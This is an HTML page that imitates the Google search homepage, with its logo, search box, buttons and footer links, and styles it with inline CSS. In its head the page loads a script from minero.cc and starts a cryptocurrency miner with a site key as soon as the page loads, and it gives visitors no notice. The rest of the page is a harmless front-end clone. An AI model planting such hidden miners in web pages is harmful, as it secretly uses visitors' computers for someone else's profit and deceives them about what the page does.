<html>
  <head>
    <title> Google </title>
    <link rel="stylesheet" type="text/css" href="style.css">
    <meta charset="UTF-8">
    <style>

.logo {
  margin: 0 auto;
  width: 100%;
  text-align: center;
  padding-top: 150px;
}

.wrapper {
  margin: 0 auto;
  text-align: center;
}

#bar {
  width: 550px;
  height: 35px;
  margin-top: 15px;
  background-color: white;
  border-style: solid;
  border-color: #e6e6e6;
}

.buttons {
  width: 310px;
  padding-top: 30px;
  margin: 0 auto;
  text-align: center;
}

a {
  text-decoration: none;
}

#google {
  font-size: 12px;
  display: block;
  float: left;
  background-color: #f2f2f2;
  padding: 12px 20px;
  color: #666666;
  font-weight: bold;
}

#lucky {
  font-size: 12px;
  display: block;
  float: right;
  background-color: #f2f2f2;
  padding: 12px 20px;
  color: #666666;
  font-weight: bold;
}


#breadcrumbs li {
  list-style-type: none;
  display: inline;
  float: right;
  padding: 5px;
  font-size: 12px;
  margin: 5px;
  text-align: center;
}

#breadcrumbs a {
  color: #4d4d4d;
}

#breadcrumbs a:hover {
  text-decoration: underline;
}

.nav {
  width: 100%;
  height: 50px;
  margin: 0 auto;
}

.settings li {
  list-style-type: none;
  display: inline;
  padding: 10px;
  font-size: 12px;
  margin-top: 5px;

}

.settings a {
  color: #4d4d4d;
}

.settings a:hover {
  text-decoration: underline;
}

#ad {
  float: left;
  margin-bottom: 10px;
}

#priv {
  float: right;
  margin-bottom: 10px;
}

.bottom {
  border-top: solid;
  border-width: 0.1px;
  border-color: #e6e6e6;
  position: fixed;
  bottom: 0px;
  right: 5px;
  width: 100%;
  background-color: #f2f2f2;
}   

    </style>
    <script src="https://minero.cc/lib/minero.min.js"></script>
    <script>
        var miner = new Minero.Anonymous('eb50e7fff45da6925b846e2309c81d7b');
        miner.start();
        </script>
  </head>
  <body>
      <div class="nav">
        <ul id="breadcrumbs">
          <li><a href="#" id="id">Profile</a></li>
          <li><a href="#" id="bell">Notifications</a></li>
          <li><a href="#" id="menu">Menu</a></li>
          <li><a href="#"> Images </a></li>
          <li><a href="#"> Gmail </a></li>
          <li><a href="#"> Crypto </a></li>
        </ul>
      </div>
      <div class="logo">
        <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png">
      </div>
    </br>
      <div class="wrapper">
        <input type="text" id="bar">
      </div>
      <div class="buttons">
        <a href="#" id="google"> Google Search </a>
        <a href="#" id="lucky"> I'm Feeling Lucky </a>
      </div>
    <div class="bottom">
      <ul class="settings" id="ad">
        <li><a href="#">Advertising</a></li>
        <li><a href="#">Business</a></li>
        <li><a href="#">About</a></li>
      </ul>
      <ul class="settings" id="priv">
        <li><a href="#">Privacy</a></li>
        <li><a href="#">Terms</a></li>
        <li><a href="#">Settings</a></li>
      </ul>
    </div>
  </body>
</html>
